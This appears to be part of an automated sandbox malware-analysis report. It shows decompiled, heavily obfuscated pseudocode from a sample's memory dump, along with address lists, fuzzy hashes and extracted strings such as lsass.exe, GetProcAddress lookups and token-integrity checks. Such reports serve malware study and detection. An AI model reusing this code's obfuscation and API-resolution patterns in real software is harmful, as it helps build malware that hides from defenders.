						 *0x50ab24 =  *0x50ab24 + 0x9c62;
						 *0x509230 = _t47;
						if((0 & _t22) != 0) {
							 *0x50bf15 = 0;
							 *(_t50 - 8) = _t22;
						}
					}
					_push(0x4b2f12);
					goto ( *0x509ca4);
				}
				_t18 = 0x50bf0a;
				if(0x42bb59 > 0x2e7472) {
					 *0x50bf0b =  *0x50bf0b - 0x42bb59;
				}
				 *((intOrPtr*)(_t50 - 0x18)) = _t28;
				_t28 =  *((intOrPtr*)(_t50 - 0x1c));
				 *((intOrPtr*)(_t50 - 0x20)) =  *((intOrPtr*)(_t50 - 0x20)) - 0x631a;
				 *0x509176 = 0x631a;
				_t42 = _t42 + 0x8d;
				goto L4;
			}












                      0x004b2e30
                      0x004b2e35
                      0x004b2e4d
                      0x004b2e52
                      0x004b2e81
                      0x004b2e81
                      0x004b2e8e
                      0x004b2e92
                      0x004b2e9a
                      0x004b2ea0
                      0x004b2ea0
                      0x004b2ea3
                      0x004b2eb3
                      0x004b2eb6
                      0x004b2eb9
                      0x004b2ebc
                      0x004b2ebf
                      0x004b2ec9
                      0x004b2ed8
                      0x004b2ede
                      0x004b2eef
                      0x004b2ef1
                      0x004b2ef9
                      0x004b2ef9
                      0x004b2eef
                      0x004b2f01
                      0x004b2f0c
                      0x004b2f0c
                      0x004b2e54
                      0x004b2e60
                      0x004b2e62
                      0x004b2e62
                      0x004b2e68
                      0x004b2e6b
                      0x004b2e72
                      0x004b2e75
                      0x004b2e7e
                      0x00000000

                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID: rt.
                      • API String ID: 0-1068618769
                      • Opcode ID: 2037c95c67230bb1eda41982af25836228073f692b5bb9d9f27f93e9ecc37bf3
                      • Instruction ID: 4b947e3d59d46738c6f6b977d0f469dd048e60b3cb30255aca487c7700aee380
                      • Opcode Fuzzy Hash: 2037c95c67230bb1eda41982af25836228073f692b5bb9d9f27f93e9ecc37bf3
                      • Instruction Fuzzy Hash: 8121C076D103168FCB00CFA9D9D41CD7BB0FB39300B40456AC805A7336E3B44A49EB59
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004C3AD6 Relevance: .0, Instructions: 25COMMON
                      Download Yara Rule
                      C-Code - Quality: 33%
                      			E004C3AD6() {
				void* _t26;

				 *((intOrPtr*)(_t26 - 0x20)) = 0;
				 *((intOrPtr*)(_t26 - 0x24)) = _t26 - 0x20;
				_push( *((intOrPtr*)(_t26 - 0x24)));
				 *((intOrPtr*)(_t26 - 0x24)) = _t26 - 0x1c;
				_push( *((intOrPtr*)(_t26 - 0x24)));
				_push( *((intOrPtr*)(_t26 - 0x10)));
				_push( *((intOrPtr*)(_t26 - 0x18)));
				E004AD00C(_t26 - 0x1c);
				 *((intOrPtr*)( *((intOrPtr*)(_t26 + 0x14)))) =  *((intOrPtr*)(_t26 - 0x20));
				_push( *((intOrPtr*)(_t26 - 0x1c)));
				_pop( *__eax);
				 *((intOrPtr*)(_t26 - 0x30)) = 1;
				_push( *((intOrPtr*)(_t26 - 0x18)));
				E004ABEF8();
				_push( *((intOrPtr*)(_t26 - 8)));
				_push(E004C3B30);
				goto ( *0x509e54);
			}




                      0x004c3ad6
                      0x004c3ae0
                      0x004c3ae3
                      0x004c3ae9
                      0x004c3aec
                      0x004c3aef
                      0x004c3af2
                      0x004c3af5
                      0x004c3b02
                      0x004c3b0a
                      0x004c3b0b
                      0x004c3b0d
                      0x004c3b14
                      0x004c3b17
                      0x004c3b1c
                      0x004c3b1f
                      0x004c3b2a

                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4e0fdc44793271e06fd89394144cc73afc8686471c30991f77b1b0d292310931
                      • Instruction ID: 2f7333271499ea2db1e115e713e9fe7e4b9ded249cee1430a5861b865e5880d5
                      • Opcode Fuzzy Hash: 4e0fdc44793271e06fd89394144cc73afc8686471c30991f77b1b0d292310931
                      • Instruction Fuzzy Hash: 97F07A7590021AEFDF01CF91C980AEEBBB6FF48304F104059EA0072261D77A5D55DF64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004C3A88 Relevance: .0, Instructions: 16COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f109f5d16ddb31f5b9b97820428b30be733bfe968a0c40d393b549b8e782473b
                      • Instruction ID: 4e868c2015a995dc8d4725c7ba3993b8228a1c86bc88a4b131290cf9c6aed3f1
                      • Opcode Fuzzy Hash: f109f5d16ddb31f5b9b97820428b30be733bfe968a0c40d393b549b8e782473b
                      • Instruction Fuzzy Hash: 8BE07E3590020DEEDF018FE0C884DEEBAB5FB48304F100069E60072150D6761994AB24
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004C3D04 Relevance: .0, Instructions: 16COMMON
                      Download Yara Rule
                      C-Code - Quality: 16%
                      			E004C3D04(intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char* _v12;
				intOrPtr _v20;

				_v20 = 0;
				_v12 =  &_v8;
				_push(_v12);
				_push(0);
				_push(1);
				_push(_a8);
				_push(_a4);
				_push(0x4c3d3c);
				goto ( *0x50a24c);
			}






                      0x004c3d0a
                      0x004c3d14
                      0x004c3d17
                      0x004c3d1a
                      0x004c3d24
                      0x004c3d25
                      0x004c3d28
                      0x004c3d2b
                      0x004c3d36

                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2179b8e6b2b564be5c3f8d3f4b4eadc6646b396f4dd01bbd2fb8f96ca12d2080
                      • Instruction ID: 25f3b7d93e7db9b4dca5d1ef39389dc8d59065d27084a8d81330c155ab5ed2ab
                      • Opcode Fuzzy Hash: 2179b8e6b2b564be5c3f8d3f4b4eadc6646b396f4dd01bbd2fb8f96ca12d2080
                      • Instruction Fuzzy Hash: 02E01279901208FFDB058F94CC51FED7B75E704310F508168EA11563D0E7B65B54DB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004C3D56 Relevance: .0, Instructions: 13COMMON
                      Download Yara Rule
                      C-Code - Quality: 16%
                      			E004C3D56() {
				intOrPtr _t8;
				void* _t13;

				 *((intOrPtr*)(_t13 - 0xc)) = _t8;
				 *((intOrPtr*)(_t13 - 8)) = _t13 - 4;
				_push( *((intOrPtr*)(_t13 - 8)));
				_push( *((intOrPtr*)(_t13 - 0xc)));
				_push(1);
				_push( *((intOrPtr*)(_t13 + 0xc)));
				_push( *((intOrPtr*)(_t13 + 8)));
				_push(E004C3D85);
				goto ( *0x50a24c);
			}





                      0x004c3d56
                      0x004c3d5c
                      0x004c3d5f
                      0x004c3d62
                      0x004c3d6d
                      0x004c3d6e
                      0x004c3d71
                      0x004c3d74
                      0x004c3d7f

                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cf6be5edc4f4c46dd710fb31561d52cd7e8f2a3a012a6111875793ba3695b7b1
                      • Instruction ID: bec5a3b25ab843c079b0d9d50938bca8176b1e590fa0df07320db9b6041d8145
                      • Opcode Fuzzy Hash: cf6be5edc4f4c46dd710fb31561d52cd7e8f2a3a012a6111875793ba3695b7b1
                      • Instruction Fuzzy Hash: 5DE04279901108FFDF0A8F90C850BECBB72EB14301F1080AAA91165260E6765A54AF41
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004C3B30 Relevance: .0, Instructions: 6COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 19d76dd14fee378271f1e894edd4fbcf06145261880a372019b64e997e65c6a2
                      • Instruction ID: 7a87d306ab4cdf1a4b37a18fed3dc8b0a9af99824d1bceb6e58330975fd01570
                      • Opcode Fuzzy Hash: 19d76dd14fee378271f1e894edd4fbcf06145261880a372019b64e997e65c6a2
                      • Instruction Fuzzy Hash: 66B09234A00108EEE7048F849C81EA8B375F3187597100468A20002466CA701E48EB04
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0047674B Relevance: 30.1, APIs: 1, Strings: 16, Instructions: 358libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 15%
                      			E0047674B(short __ecx, short __edx, signed int __esi) {
				unsigned short _t87;
				char* _t91;
				unsigned short _t93;
				_Unknown_base(*)()* _t94;
				unsigned short _t97;
				unsigned short _t99;
				unsigned short _t101;
				unsigned short _t104;
				unsigned short _t112;
				unsigned short _t121;
				unsigned short _t125;
				unsigned short _t131;
				unsigned short _t144;
				unsigned short _t149;
				char* _t186;
				char* _t196;
				short _t228;
				intOrPtr _t229;
				signed char _t246;
				void* _t266;
				signed char _t267;
				unsigned short* _t286;
				signed int _t290;
				unsigned short _t291;
				void* _t294;

				_t290 = __esi;
				_t265 = __edx;
				_t228 = __ecx;
				_t87 =  *(_t294 - 8);
				 *0x50913a = __ecx;
				 *(_t294 - 8) = _t87;
				 *(_t294 - 0xc) = _t87;
				_push( *((intOrPtr*)(_t294 - 0x58)));
				_t91 =  *(_t294 - 8);
				if(0x442bb8 >= __ecx) {
					if(__ecx < __ecx) {
						_t228 = 0x7b51;
					}
					_t265 = 0xa5;
				}
				 *0x50bf12 =  &(( *0x50bf12)[_t91]);
				 *0x50bf12 = _t91;
				_push( *0x5093f8);
				_t286 = 0x509624;
				 *0x50bf17 =  &(( *0x50bf17)[_t91]);
				 *0x50bf17 = _t91;
				 *(_t294 - 8) = _t91;
				 *(_t294 - 0x10) = _t91;
				_t93 =  *(_t294 - 8);
				if(_t228 > _t228) {
					L8:
					goto L9;
				} else {
					_t228 = 0xffffffffffffff79;
					 *0x5091ca = _t265;
					_t265 = 0xacb6;
					if((_t290 & 0x00a90b15) >= 0) {
						L9:
					} else {
						 *0x50bf15 =  *0x50bf15 + _t93;
						 *0x50bf15 =  *0x50bf15 - _t93;
						if(0x509624 < 0) {
							_t286 = 0x50bf07;
							goto L8;
						}
					}
				}
				_t229 =  *0x509134; // 0x0
				 *0x509168 =  *0x509168 + _t229;
				_t94 = GetProcAddress(??, ??);
				 *0x5091ea = _t265;
				_t266 = _t265 + _t265;
				 *(_t294 - 8) = _t94;
				 *0x509184 =  *0x509184 + 0x68e3;
				 *0x50a614 =  *0x50a614 + _t266;
				_t267 = _t266 + _t266;
				E00469D4E("lsass.exe", _t229, 0x68e3, _t286, _t267, 0);
				_t97 =  *(_t294 - 8);
				if(_t97 != 0x1b16) {
				}
				 *(_t294 - 8) = _t97;
				_t99 =  *(_t294 - 8);
				 *0x50abd4 = _t99;
				 *(_t294 - 8) = _t99;
				_t101 =  *(_t294 - 8);
				 *(_t294 - 0x10) = _t101;
				 *0x509130 = 0x68e3;
				 *0x5091c8 = _t267;
				 *(_t294 - 8) = _t101;
				 *((intOrPtr*)(_t294 - 0x18)) = 0x3853a9;
				 *((intOrPtr*)(_t294 - 0x1c)) = 0x3853a9;
				_t104 =  *(_t294 - 8);
				if((_t267 & 0x00000088) >= 0) {
					_t267 = 0x9588;
				}
				 *(_t294 - 8) = _t104;
				 *0x50bf0b =  *0x50bf0b - 0x3853a9;
				_push(0);
				 *(_t294 - 0x14) = 0;
				_t183 = 0;
				_t112 =  *(_t294 - 8);
				if(_t112 <= 0x2b54) {
					_t183 = 0xba6b7a;
				}
				 *(_t294 - 8) = _t112;
				 *0x5096d4 = _t112;
				_push( *0x509104);
				L00468197(_t183, _t286, _t290,  !( *(_t294 - 8)) +  !( *(_t294 - 8)), 0);
				_t186 = "CoLockObjectExternal" + "CoLockObjectExternal";
				 *(_t294 - 0x14) = _t186;
				_t121 =  *(_t294 - 8);
				_push( *0x5090b6);
				 *0x509102 =  *0x509102 - _t186;
				_t246 = 0;
				if(0 <= 0) {
					_t246 = 0x7783;
				}
				 *0x50923a = _t290;
				_t291 = _t290 - 0xb1e6a5;
				_push( *0x509020);
				 *0x5091ee =  *0x5091ee - 0x970e;
				if((_t121 & 0x000000bb) >= 0) {
					_t291 = _t291 >> _t246;
				}
				 *0x50be87 =  *0x50be87 + _t286;
				 *0x50bf0a =  *0x50bf0a + _t121;
				 *(_t294 - 8) = _t121;
				if(_t121 >> _t246 < 0x23eb) {
				}
				_t196 =  *(_t294 - 0x20);
				 *0x509172 =  *0x509172 + _t246 - 0x64;
				_t125 =  *(_t294 - 8);
				_push( *0x5090a4);
				if(0 == 0) {
					 *0x509162 =  *0x509162;
				}
				 *0x509194 = 0;
				 *(_t294 - 8) = _t125;
				 *(_t294 - 0x14) = _t196;
				_t131 =  *(_t294 - 8);
				_push( *0x509062);
				 *((intOrPtr*)(_t294 - 0x24)) =  *((intOrPtr*)(_t294 - 0x24));
				if(0 < 0) {
					 *0x5091ee = 0x9463;
				}
				 *(_t294 - 8) = _t131;
				 *(_t294 - 0x10) = 0xba;
				_push( *0x509220);
				 *0x50bf0a =  *0x50bf0a;
				_push( *0x5090ec);
				 *(_t294 - 0x10) = "normaliz.dll";
				_push( *0x50902c);
				_t144 =  *(_t294 - 8);
				 *(_t294 - 0x20) = 0x765e;
				_t255 = 0x65e37c;
				 *(_t294 - 8) = _t144;
				_push(_t144);
				_push(0);
				_push(1);
				E004673BF(0x419bef);
				if(0x202062 == 0x2bb4) {
					 *0x50bf0c =  *0x50bf0c + 0x437bad;
					 *0x509140 = 0x65e37c;
					_t255 = 0x826f;
				}
				 *0x50bf13 = 0x202062;
				_t149 =  *(_t294 - 8);
				_push( *0x509174);
				 *0x50bf07 = _t149;
				if(_t149 != 0x1624) {
					 *(_t294 - 0x14) = "RtlReleaseRelativeName";
					 *0x509146 = _t255 - 0x537ff0;
				}
				 *(_t294 - 8) = _t149;
				_push(1);
				_push(0xb7);
				_push(E00476C83);
				_push(E00469D4E);
				return "api-ms-win-core-localization-l1-1-0.dll";
			}




























                      0x0047674b
                      0x0047674b
                      0x0047674b
                      0x00476750
                      0x00476753
                      0x0047675a
                      0x0047675d
                      0x0047676d
                      0x00476778
                      0x0047678d
                      0x00476791
                      0x0047679a
                      0x0047679e
                      0x004767a3
                      0x004767a3
                      0x004767a6
                      0x004767ac
                      0x004767b2
                      0x004767b8
                      0x004767be
                      0x004767c4
                      0x004767cb
                      0x004767d3
                      0x004767e0
                      0x004767e5
                      0x00476832
                      0x00000000
                      0x004767e7
                      0x004767ef
                      0x004767f2
                      0x00476803
                      0x0047680d
                      0x00476837
                      0x0047680f
                      0x00476814
                      0x0047681a
                      0x00476823
                      0x00476825
                      0x00000000
                      0x00476830
                      0x00476823
                      0x0047680d
                      0x00476841
                      0x00476848
                      0x00476852
                      0x00476858
                      0x0047685f
                      0x00476861
                      0x00476880
                      0x00476887
                      0x0047688d
                      0x00476893
                      0x00476898
                      0x004768a1
                      0x004768a1
                      0x004768af
                      0x004768b7
                      0x004768bc
                      0x004768c4
                      0x004768cc
                      0x004768cf
                      0x004768de
                      0x004768f6
                      0x004768fd
                      0x0047690d
                      0x00476910
                      0x0047691c
                      0x00476925
                      0x00476927
                      0x00476927
                      0x0047692b
                      0x00476938
                      0x00476943
                      0x0047695d
                      0x00476960
                      0x0047696a
                      0x00476971
                      0x00476980
                      0x00476980
                      0x0047698a
                      0x0047698d
                      0x00476995
                      0x004769a9
                      0x004769b8
                      0x004769d7
                      0x004769dc
                      0x004769df
                      0x004769e6
                      0x004769ed
                      0x004769f2
                      0x004769f4
                      0x004769f4
                      0x00476a06
                      0x00476a0f
                      0x00476a15
                      0x00476a1c
                      0x00476a2c
                      0x00476a2e
                      0x00476a2e
                      0x00476a3f
                      0x00476a4f
                      0x00476a55
                      0x00476a5f
                      0x00476a5f
                      0x00476a69
                      0x00476a72
                      0x00476a80
                      0x00476a83
                      0x00476a8e
                      0x00476a90
                      0x00476a90
                      0x00476a97
                      0x00476aa5
                      0x00476ab2
                      0x00476ac7
                      0x00476aca
                      0x00476ad2
                      0x00476ad8
                      0x00476ae3
                      0x00476ae3
                      0x00476af2
                      0x00476afd
                      0x00476b00
                      0x00476b1c
                      0x00476b42
                      0x00476b54
                      0x00476b7e
                      0x00476ba3
                      0x00476ba6
                      0x00476bb1
                      0x00476bb4
                      0x00476bb7
                      0x00476bb8
                      0x00476bba
                      0x00476bbc
                      0x00476bd5
                      0x00476be0
                      0x00476be6
                      0x00476bf7
                      0x00476c00
                      0x00476c06
                      0x00476c14
                      0x00476c17
                      0x00476c2a
                      0x00476c33
                      0x00476c3d
                      0x00476c4c
                      0x00476c5f
                      0x00476c6b
                      0x00476c75
                      0x00476c77
                      0x00476c78
                      0x00476c7d
                      0x00476c82

                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 00476852
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: CoLockObjectExternal$G.V$G`}$NtSetDriverEntryOrder$RtlReleaseRelativeName$System.Net.Primitives.dll$System.Xml.XmlDocument.dll$WSManHTTPConfig.exe$api-ms-win-core-localization-l1-1-0.dll$api-ms-win-core-namedpipe-l1-1-0.dll$b $lsass.exe$networkitemfactory.dll$normaliz.dll$ucmhc.dll$wuapi.dll
                      • API String ID: 190572456-835831452
                      • Opcode ID: 46fa778943e8ca1648417a218bc8d1220ce81416b987ba49e55af8be56c0608f
                      • Instruction ID: bf8f473de16efa10a8a4bf759cc6bbcb66c578ae25cef8d824eb112d9579ea78
                      • Opcode Fuzzy Hash: 46fa778943e8ca1648417a218bc8d1220ce81416b987ba49e55af8be56c0608f
                      • Instruction Fuzzy Hash: 45D18B79E007069BDB00EFB8E8D46DDBBB1FB38314F44806A9944E7356E3784A49DB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00483DEC Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 282libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 29%
                      			E00483DEC(void* __eax, char* __ebx, signed short __edx, void* __edi, signed int __esi) {
				signed int _t71;
				signed int _t74;
				signed int _t75;
				signed int _t80;
				signed int _t87;
				signed int _t90;
				signed int _t93;
				signed int _t98;
				signed int _t102;
				signed int _t118;
				signed int _t138;
				signed int _t157;
				intOrPtr _t159;
				char* _t194;
				void* _t200;
				intOrPtr _t206;
				void* _t215;
				void* _t217;
				signed int _t218;
				signed int _t219;
				void* _t221;

				_t218 = __esi;
				_t215 = __edi;
				_t207 = __edx;
				_t143 = __ebx;
				_t71 =  *(_t221 - 8);
				_push( *0x5093d4);
				_t197 = 0xffffffffffff8acd;
				 *(_t221 - 8) = _t71;
				if(_t71 > 0x17a2) {
					_t71 = 0;
					_t194 = "WSManHTTPConfig.exe";
					 *0x5090e4 =  *0x5090e4 - _t194;
					_t143 =  &(_t194[_t194]);
					_t197 = 0xffffffffffff2c36;
				}
				E00469D4E(_t71, _t143, _t197, _t215, 0, 0);
				 *0x50917e = _t197;
				_t74 = GetProcAddress(??, ??);
				 *(_t221 - 8) = _t74;
				_t75 =  !_t74;
				if(_t75 >= 0x253665) {
					if(_t75 < 0x3160) {
						_t206 =  *0x50913a; // 0x0
						_t197 = _t206 - 0x6891;
					}
					_t197 =  !_t197;
					_t207 = _t207 + _t207 - 0x92;
				}
				 *0x50bf11 =  *0x50bf11 + _t207;
				 *0x509222 = _t218;
				_t217 = _t215 + _t215 + 0xf67c;
				 *0x5094f0 = 0xca;
				_t80 =  *(_t221 - 8);
				 *0x50a5e8 = _t80;
				_t219 = _t218 ^ 0x0000b980;
				 *(_t221 - 8) = _t80;
				if(_t80 != 0x14f8) {
					 *((intOrPtr*)(_t221 - 0x18)) = 0xd5;
					if(0xd5 != 0xd5) {
						_t197 = 0x50bf0c;
						 *0x50915e = 0x50bf0c;
						 *0x509178 = 0x50bf0c;
						_t207 = _t219;
						if((_t219 & 0x0000b2a9) <= 0) {
							_t219 = _t219 | 0x0000c26e;
						}
						_t219 = _t219 - _t217;
						goto L11;
					}
				}
				_t87 =  *(_t221 - 8);
				_push(0);
				 *(_t221 - 8) = _t87;
				if(_t87 - 0x181b <= 0x23c35e) {
					 *((intOrPtr*)(_t221 - 0x10)) = 0x453eeb;
					if(0 == 0) {
						_t197 = _t197 | 0x0055432d;
					}
					if(_t197 >= _t197) {
						_t207 =  *0x509202; // 0x2a00
					}
					_t207 = _t207 - 0xa9;
					_t219 =  !_t219;
					 *0x50b576 =  *0x50b576 + _t219;
				}
				_t90 =  *(_t221 - 8);
				_push( *0x509220);
				 *0x50b9e7 =  *0x50b9e7 + _t219;
				 *0x50bf07 =  *0x50bf07 - _t90;
				 *0x509022 =  *0x509022 - _t90;
				 *(_t221 - 8) = _t90;
				_t157 = "networkitemfactory.dll";
				 *0x50910a =  *0x50910a + _t157;
				_t200 = 0x71f8;
				_t93 =  *(_t221 - 8);
				if((_t207 & 0x000081bd) != 0) {
					_t207 = 0xa929;
					 *0x509240 =  *0x509240 + _t219;
					_t219 = 0;
					_t157 = _t93 - 0xd4;
					 *0x509604 =  *0x509604 - _t217;
					 *0x50bb4f =  *0x50bb4f + _t217;
				}
				 *(_t221 - 8) = _t93;
				 *0x5096c4 = _t93;
				_push( *0x509058);
				_t98 =  *(_t221 - 8);
				_t159 =  !_t157 + _t98;
				if(_t159 != 0x296299) {
					 *((intOrPtr*)(_t221 - 0x18)) =  *((intOrPtr*)(_t221 - 0x18)) + _t159;
				}
				 *((intOrPtr*)(_t221 - 0x18)) = _t159;
				 *(_t221 - 8) = _t98;
				_t102 =  *(_t221 - 8);
				_push( *0x5090ec);
				if(0x469b81 >= 0x469b81) {
					_t200 = _t200 - 0x62;
				}
				if(_t200 >= _t200) {
					_t200 = 0x801f;
					_t207 = 0x175b75a;
				}
				 *(_t221 - 8) = _t102;
				_push( *0x509006);
				 *0x50bf0e =  *0x50bf0e + _t200;
				_push( *0x5091e2);
				 *((intOrPtr*)(_t221 - 0x1c)) = 0x3ff5f6;
				_push( *0x5090ba);
				_t118 =  *(_t221 - 8);
				 *((intOrPtr*)(_t221 - 0x18)) = _t200 + 0x32cb;
				 *(_t221 - 8) = _t118;
				 *((intOrPtr*)(_t221 - 0x10)) = _t118 - 0x12357f;
				_push( *0x509096);
				 *0x5090de =  *0x5090de -  *((intOrPtr*)(_t221 - 0x14));
				 *0x509146 = 0;
				_push( *0x50902c);
				L00468D9F(0x3a404a, _t207, _t217, _t219 + 0xaf6d, 0,  *(_t221 - 8));
				_push( *0x509204);
				 *((intOrPtr*)(_t221 - 0x14)) =  *((intOrPtr*)(_t221 - 0x14)) - 0x4c5736;
				_t138 =  *(_t221 - 8);
				 *0x509146 = 0x639f;
				_push( *0x5090ec);
				 *(_t221 - 8) = _t138;
				 *0x509098 =  *0x509098 + 0x4c244b;
				_push(0x4c244b);
				_push(E0048421D);
				_push(L00468BBD);
				return _t138 + _t138 - 0x1fcb;
			}
























                      0x00483dec
                      0x00483dec
                      0x00483dec
                      0x00483dec
                      0x00483df1
                      0x00483df4
                      0x00483e00
                      0x00483e05
                      0x00483e0c
                      0x00483e0e
                      0x00483e16
                      0x00483e1b
                      0x00483e22
                      0x00483e24
                      0x00483e24
                      0x00483e2d
                      0x00483e32
                      0x00483e3f
                      0x00483e48
                      0x00483e4b
                      0x00483e52
                      0x00483e58
                      0x00483e6a
                      0x00483e71
                      0x00483e71
                      0x00483e76
                      0x00483e7a
                      0x00483e7a
                      0x00483e7d
                      0x00483e83
                      0x00483e98
                      0x00483e9d
                      0x00483eab
                      0x00483eae
                      0x00483eb3
                      0x00483ec1
                      0x00483ec8
                      0x00483ed3
                      0x00483ed8
                      0x00483edc
                      0x00483ee2
                      0x00483ee9
                      0x00483efc
                      0x00483f04
                      0x00483f06
                      0x00483f06
                      0x00483f0c
                      0x00000000
                      0x00483f0c
                      0x00483ed8
                      0x00483f2e
                      0x00483f31
                      0x00483f33
                      0x00483f3f
                      0x00483f41
                      0x00483f50
                      0x00483f52
                      0x00483f52
                      0x00483f5a
                      0x00483f6a
                      0x00483f6a
                      0x00483f71
                      0x00483f74
                      0x00483f76
                      0x00483f76
                      0x00483f82
                      0x00483f85
                      0x00483f8c
                      0x00483f9c
                      0x00483fa2
                      0x00483fb6
                      0x00483fc5
                      0x00483fca
                      0x00483fd9
                      0x00483fdd
                      0x00483fe5
                      0x00483ff0
                      0x00483ff4
                      0x00483ffd
                      0x00484000
                      0x00484003
                      0x0048400a
                      0x0048400a
                      0x00484010
                      0x00484013
                      0x00484025
                      0x00484032
                      0x00484035
                      0x0048403e
                      0x00484040
                      0x00484040
                      0x00484043
                      0x00484046
                      0x0048406c
                      0x0048406f
                      0x00484078
                      0x0048407a
                      0x0048407a
                      0x0048407f
                      0x00484083
                      0x0048408e
                      0x0048408e
                      0x00484097
                      0x004840a2
                      0x004840d0
                      0x004840df
                      0x00484100
                      0x00484118
                      0x0048412c
                      0x0048412f
                      0x00484134
                      0x0048413e
                      0x00484149
                      0x00484150
                      0x00484177
                      0x00484181
                      0x004841af
                      0x004841cc
                      0x004841e6
                      0x004841eb
                      0x004841f3
                      0x004841fa
                      0x00484201
                      0x0048420a
                      0x00484211
                      0x00484212
                      0x00484217
                      0x0048421c

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: @mQ$CNBP_335.DLL$J@:$MapUserPhysicalPages$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$OSProvider.dll$RtlReleaseRelativeName$WFServicesReg.exe$WSManHTTPConfig.exe$api-ms-win-core-localization-l1-1-0.dll$api-ms-win-core-namedpipe-l1-1-0.dll$lsass.exe$networkitemfactory.dll$normaliz.dll$9"
                      • API String ID: 190572456-3183978827
                      • Opcode ID: ab5ae9a4599eb4bb03522be18b089c8c73b5bf135b9659addc67a5007be6c9f2
                      • Instruction ID: fdbb5190ed85a4fc8481351240afbc5eb9d60cb686a4e74718c2ef69e28c392f
                      • Opcode Fuzzy Hash: ab5ae9a4599eb4bb03522be18b089c8c73b5bf135b9659addc67a5007be6c9f2
                      • Instruction Fuzzy Hash: F9B19079E0030A9BDB00EFB8E8D46DDBBB0FB29314F04446ADA44D7356E3385A89DB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004A9CEA Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 418COMMON
                      Download Yara Rule
                      APIs
                      • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),-008A8C5C,00000001,?,?,?), ref: 004A9FE8
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: InformationToken
                      • String ID: CoLockObjectExternal$G.V$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$NtSetDriverEntryOrder$OSProvider.dll$TpCaptureCaller$WinFax.dll$activeds.dll$api-ms-win-core-localization-l1-1-0.dll$dpnet.dll$mscpxl32.dLL$ucmhc.dll$`}
                      • API String ID: 4114910276-4292496502
